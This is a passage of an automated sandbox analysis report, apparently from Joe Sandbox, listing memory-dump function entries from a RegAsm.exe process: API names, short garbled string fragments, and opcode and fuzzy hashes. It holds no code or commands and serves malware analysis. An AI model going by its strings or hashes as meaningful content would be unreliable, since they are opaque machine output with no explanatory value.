        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: FreeHeap
        • String ID:
        • API String ID: 3298025750-0
        • Opcode ID: c8eb1b5f902db61b7fdcf8998cd4d462fcf4ac418044278937692415990431ca
        • Instruction ID: b99520e442b5103068d20eebea8ceedfe316ff1c9b725666a4638859ffb814d3
        • Opcode Fuzzy Hash: c8eb1b5f902db61b7fdcf8998cd4d462fcf4ac418044278937692415990431ca
        • Instruction Fuzzy Hash: FFC080391441009FD6048F10DC45B353369F755705F10187CE506C12E3CA20DC15DD0C
        APIs
        • RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 0043AA7D
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: AllocateHeap
        • String ID:
        • API String ID: 1279760036-0
        • Opcode ID: e48826d4c4b75912ac203f9eb20402879578ed53c4114f2f30e14c69dc3f2eb1
        • Instruction ID: bc01fb9524668cde8e3e97ee74b7d0957eb987fe7114e3071a8faee555c0f673
        • Opcode Fuzzy Hash: e48826d4c4b75912ac203f9eb20402879578ed53c4114f2f30e14c69dc3f2eb1
        • Instruction Fuzzy Hash: C4C012381481089BD608CB10EC91F76372EE7CA612F148028E48343361C23098139A18
        APIs
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: Clipboard$CloseDataLongOpenWindow
        • String ID:
        • API String ID: 1647500905-0
        • Opcode ID: c42072921177bc784a49dc2ecde762dfeaa1b47fa3ce775427dbbe90ea03cd3e
        • Instruction ID: a58f9c31ffd0da66f335f8d56462364fb8cf3bd821a58cce9afa8a919224b9c1
        • Opcode Fuzzy Hash: c42072921177bc784a49dc2ecde762dfeaa1b47fa3ce775427dbbe90ea03cd3e
        • Instruction Fuzzy Hash: EB717D74608B41DFC320DF78C45561ABBE0AF1A310F108B6EE4DA87791D738A855DB97
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: #M*O$.A+C$<Y9[$de$q
        • API String ID: 0-2301291036
        • Opcode ID: 2e8f5385e92c8c6e7ec2eeb3d3e635bf3f26ae69e773f5ccbf44b89f15b7456c
        • Instruction ID: aa240042138c986817e9b4b358af31d3fe11580a1198047475b9b9fa5582111f
        • Opcode Fuzzy Hash: 2e8f5385e92c8c6e7ec2eeb3d3e635bf3f26ae69e773f5ccbf44b89f15b7456c
        • Instruction Fuzzy Hash: 3622ED75A083518FD324CF24E88072BB7F2AFC6314F55892DE88A97391D738D945CB8A
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: P_B
        • API String ID: 0-906794629
        • Opcode ID: a09de4cff80ece7cf7e5d5501bfcc30739e2e0a5fc213040b74ebebb36e32223
        • Instruction ID: 247aeb099a37abac29fb2abe1af913bc7e9570d8043b8720d2e58d3f13425c6b
        • Opcode Fuzzy Hash: a09de4cff80ece7cf7e5d5501bfcc30739e2e0a5fc213040b74ebebb36e32223
        • Instruction Fuzzy Hash: 6DD19C712083218BD714DF18D8A1B6BB7F1FF95354F448A1DE4C18B3A0E3789945CB9A
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: "
        • API String ID: 0-123907689
        • Opcode ID: 73303fa99c23672edcd91aa0bc4b03b67aaca62d52c59e1dfb1f0fc5beb92917
        • Instruction ID: 232c928df96498e70451627f886274eb343c6cc0946caba914b60865c80523c0
        • Opcode Fuzzy Hash: 73303fa99c23672edcd91aa0bc4b03b67aaca62d52c59e1dfb1f0fc5beb92917
        • Instruction Fuzzy Hash: 18E116716082518FD724CF28D88032ABBE3EFDB320F59476EE495973E1C77899458B46
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: 2mC
        • API String ID: 0-3878219052
        • Opcode ID: a1de98b2818a2a28d9ca77c7a86fe1de837eff0c9eb8b35c304899fd18acab2f
        • Instruction ID: 5720ded9b0efbdedd827fa4885a4df752158c37772ef617e7de1af59f48536f2
        • Opcode Fuzzy Hash: a1de98b2818a2a28d9ca77c7a86fe1de837eff0c9eb8b35c304899fd18acab2f
        • Instruction Fuzzy Hash: C9618D742047019FD728CF19D490B27B7E1FB4D304F14992EE59A8BB91CB75E451CB98
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: b
        • API String ID: 0-1908338681
        • Opcode ID: 1017eab8d6116623c7ffa8d6d6b1b71d4f7cd099dd98ff40ede101813820451b
        • Instruction ID: 80932a96dabd6fba4884692ddb85ff075f5917e2d19bc36c452f934854995108
        • Opcode Fuzzy Hash: 1017eab8d6116623c7ffa8d6d6b1b71d4f7cd099dd98ff40ede101813820451b
        • Instruction Fuzzy Hash: C6519C756082408FD344EF28C884B6EBBE5EF96304F48A92DE0C5C3352D739D855CB5A
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: 498;
        • API String ID: 0-3542301482
        • Opcode ID: 09a9a01646e12645aaf5c968d4c14030ce9929390587507658b93841de193463
        • Instruction ID: ac37a49ea8b69cea9736704d5cedc65c3feb6e6e51624a86b23fe8f485ff2691
        • Opcode Fuzzy Hash: 09a9a01646e12645aaf5c968d4c14030ce9929390587507658b93841de193463
        • Instruction Fuzzy Hash: 940104B55583829BD304DF18C890A1BBBE1EBD6394F18A82DF4C5C7761C738D886CB4A
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 676654bf90ae7c076ee61dca5fb71295f07adfb3806d79b63123aa3281b0e48a
        • Instruction ID: d96b1b7d1acfd82c45ae602ab2f1db41cd8fad78e31ee9098ef99b4826ea1e4b
        • Opcode Fuzzy Hash: 676654bf90ae7c076ee61dca5fb71295f07adfb3806d79b63123aa3281b0e48a
        • Instruction Fuzzy Hash: 0452CF39608201CFC714CF28D99061AB7F2FF8E315F1A896DD58A97761C734E865CB86
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 994ddfeb7f87985db57da05d951359d575f408c5735cb59e69eee654325c9775
        • Instruction ID: db93dc518552f9e0816e515711cd38a6c54d0735dbf575617fb0d9a6114185c0
        • Opcode Fuzzy Hash: 994ddfeb7f87985db57da05d951359d575f408c5735cb59e69eee654325c9775
        • Instruction Fuzzy Hash: 4052C3716087118BC724DF18D68067AB3E1FFD4314F19893ED9C6A7385DB38A952CB8A
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: d1ed671ef8a2cb44e8f7e893591d7946374c8005618ae340ea25e921c1de7810
        • Instruction ID: 38a9d0a05bd55ec99e73eb7f432d91ecab70fe03f48622fc6ada1aa9483154c4
        • Opcode Fuzzy Hash: d1ed671ef8a2cb44e8f7e893591d7946374c8005618ae340ea25e921c1de7810
        • Instruction Fuzzy Hash: BD42AA36608201CFC714CF28D99061AB7F2FF8E315F1A896DD98A97761C734E856CB86
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: c6680dd2cc2a4446fa2f6e9cf8ad5f6abbae828f5cc1c5fffe7c008785fb4a58
        • Instruction ID: d9548218d18cf33fcbe66682fe19dccb8af6609f733d76804b66ef64824dba13
        • Opcode Fuzzy Hash: c6680dd2cc2a4446fa2f6e9cf8ad5f6abbae828f5cc1c5fffe7c008785fb4a58
        • Instruction Fuzzy Hash: 4C32AC35608201CFC718CF28D99061AB7F2FF8E314F1A896DD89A97761D734E856CB86
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: bac76700491854509ec415a84dfd0b784d77b94190e5710fa7ce445890c11f4c
        • Instruction ID: 59d65b411b386426b5fb11d6fc128fa00613d9b939312cb1e3397b9cb6e07d21
        • Opcode Fuzzy Hash: bac76700491854509ec415a84dfd0b784d77b94190e5710fa7ce445890c11f4c
        • Instruction Fuzzy Hash: D822A875A083019FD714CF19C880B2BB7E2BBC9314F589A2EE4959B391D778EC01CB96
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: f34db4a2fed09c2dab522fb6ff9fe118369dc3da74183d1845f2faebba8118fd
        • Instruction ID: 290e51a3c35c362c28d448779af3692e7db43c1f7c69de891923527f616dc0ef
        • Opcode Fuzzy Hash: f34db4a2fed09c2dab522fb6ff9fe118369dc3da74183d1845f2faebba8118fd
        • Instruction Fuzzy Hash: 8322CD35608201CFC718CF28D99065AB7F2FF8E314F1A896DD89A97351D734E856CB86
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 90fc3aa887b2855c1f0bb271f259073480a145ef2ad53f759760400e457cb131
        • Instruction ID: 3b9c778957af2ac04a54f9e889ecfca3d244060231a92b6bfdd8168e8b1c2d67
        • Opcode Fuzzy Hash: 90fc3aa887b2855c1f0bb271f259073480a145ef2ad53f759760400e457cb131
        • Instruction Fuzzy Hash: ADD1F4729083118BC714CF28C8917ABB3F2EF99314F08862DE9858B395E778AD81C7D5
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 5f286bd4195f7120d0d9b37f52b4064d1f253c6a01f5768f84f14eb3d9d42d49
        • Instruction ID: 6e0facec9e6eb2b8caa887373d178651fb31e6c7f7b6827d1c54b5623ce07eb2
        • Opcode Fuzzy Hash: 5f286bd4195f7120d0d9b37f52b4064d1f253c6a01f5768f84f14eb3d9d42d49
        • Instruction Fuzzy Hash: 09D1BFB19083419BD712DF24C8C07ABBBE4AF96355F44092EF4D687391E738D988C79A
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: ae31ed283284e28720c5c500a65ac4d6a72693834d8449f8a2337d0ab0f52c5b
        • Instruction ID: 22f88a2dd83cec99b6dd0f9c4efc68ffe64f26af1e1504b8987a511738a931a8
        • Opcode Fuzzy Hash: ae31ed283284e28720c5c500a65ac4d6a72693834d8449f8a2337d0ab0f52c5b
        • Instruction Fuzzy Hash: 4E4106B590C3149BC3219F94C8807A7B7E8EB51318F0A457ED88987382F779EC84C79A
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 984613e7b19238dd03422d57c58c45a54beaa5e171a10cababbcbfbe51ad76f1
        • Instruction ID: 520b88c8d1416e2c03a1004ef075438dcdb5ea6f1177f41786c8c87d0255b946
        • Opcode Fuzzy Hash: 984613e7b19238dd03422d57c58c45a54beaa5e171a10cababbcbfbe51ad76f1
        • Instruction Fuzzy Hash: 1D3187715083049FD310DF09C880B6BF7E0EB99318F18AA1DF4D8AB391C739D8068B9A
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 88b1e5a90fee89b756768336139c70cd48474458f2621e540c5585c1aeea5517
        • Instruction ID: a009b63b9e9a791cae38541774d5787fe1cbf14bb7d394cb0f1babf1797a705e
        • Opcode Fuzzy Hash: 88b1e5a90fee89b756768336139c70cd48474458f2621e540c5585c1aeea5517
        • Instruction Fuzzy Hash: F8314F396082919BD718CF14D4A06ABB7A1EFCA354F19862DE4C617751D330E851CB89
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
        • Instruction ID: 81d89b0ac5dcd8d10e5bc2646e8f6b30e3a7036a2e8761ade0b7638fb5c0cff6
        • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
        • Instruction Fuzzy Hash: 2711EC33A091E40EC3168D3C8400565BF930A97636F59A39AF4B5AB2D6D52A8E8B8359
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 70f398d89658f7bf20746d38084334ee063dbb4a60ebeb23c04b5e62df213ff9
        • Instruction ID: 823b994fb5e49462cdfe3d7dea040b025afc832cdc893ec2633a52bf78430eec
        • Opcode Fuzzy Hash: 70f398d89658f7bf20746d38084334ee063dbb4a60ebeb23c04b5e62df213ff9
        • Instruction Fuzzy Hash: A7019EF1B0075147D620AE51F4C172BB2A9AB82708F19953EE949B7342DB7EEC0486A9
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 681f36d4892e3706d65a3bc1e19ee2b28b30128ed6ca0144315eedc87c2a9666
        • Instruction ID: b48e17dc229cc030bbf6952dc211fc9ba39d071c8438bcca50167bfdf8dc3b6a
        • Opcode Fuzzy Hash: 681f36d4892e3706d65a3bc1e19ee2b28b30128ed6ca0144315eedc87c2a9666
        • Instruction Fuzzy Hash: 0011ACB0910B00AFD370DF2ED946713BAF8E70A260F50171EE5AAC7A91E335A4058BD6
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 191db4d6084d89fe26f21e351e7674ac1c1dc70062e6ab66bc2f6d74317732ae
        • Instruction ID: de556b44f372de2d309952e19880188a8883b7bbb47e85479e6d23b7cd0b585b
        • Opcode Fuzzy Hash: 191db4d6084d89fe26f21e351e7674ac1c1dc70062e6ab66bc2f6d74317732ae
        • Instruction Fuzzy Hash: 01F065B0700A018FD30C8F79C852122B6E2EBCA310B44957D990ACB3F0D978EC018B18
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
        • Instruction ID: f7b405df857645bb4d449668f811515aed3229184da796e484aa4b61f44e3cc0
        • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
        • Instruction Fuzzy Hash: BFD0A7616497A20ED7588D3904E0477FBE8FA4B612B1818AFE4D2F3245D234DC164A9C
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: d475b40b366a67423cfe667ac0cdc886378d9c805cda30a273e5a19b308f7e1e
        • Instruction ID: 76855a5bd96b0da9f94c322494c98f5e98be34bab61de8ec9d2dd9b53fb5a492
        • Opcode Fuzzy Hash: d475b40b366a67423cfe667ac0cdc886378d9c805cda30a273e5a19b308f7e1e
        • Instruction Fuzzy Hash: C7C08C6DA5410083CA88DF10FC8263E623A63D7204B09B23CC60BE3341CA28D422854E
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 415b3efd89355d071257ab5488caa97e473daa8a21d3899c4de7242870c4be1c
        • Instruction ID: 7805f9804a0ed9c759cb52df2ca1d8c548a5bd0251b3a4a2711d2032f67bf6fb
        • Opcode Fuzzy Hash: 415b3efd89355d071257ab5488caa97e473daa8a21d3899c4de7242870c4be1c
        • Instruction Fuzzy Hash: 06B092A9C4080086D1913B11BE4243AB0360553608F04303EE94A72242AA2ED11A519F
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 8153a543fd5523b5578e9e9695483bf6168d79d8de76887193e386a0b78202f5
        • Instruction ID: 2ca4701585c8b3fc28de7b9063d2ffa4f529484d87b1ec9c54ca895f48eef1fe
        • Opcode Fuzzy Hash: 8153a543fd5523b5578e9e9695483bf6168d79d8de76887193e386a0b78202f5
        • Instruction Fuzzy Hash: CEC09229A694808B878CCF14DC50632B3FA9BCB204B14F4288006B3A56E234DC069A0C
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: E\XC$MA[J$YDA[
        • API String ID: 0-286078667
        • Opcode ID: d92099dc2dbf92028f1a357af150cc682fae8bf609f88163bd8be50612e37e19
        • Instruction ID: ef954cbd57672fed2eccdff6b2023c048a2983481683537b9076e3848e36cd2d
        • Opcode Fuzzy Hash: d92099dc2dbf92028f1a357af150cc682fae8bf609f88163bd8be50612e37e19
        • Instruction Fuzzy Hash: 8FA14430204B918BD728CF29D840767FBE2AF96310F68866EC4E64B795D738F805CB59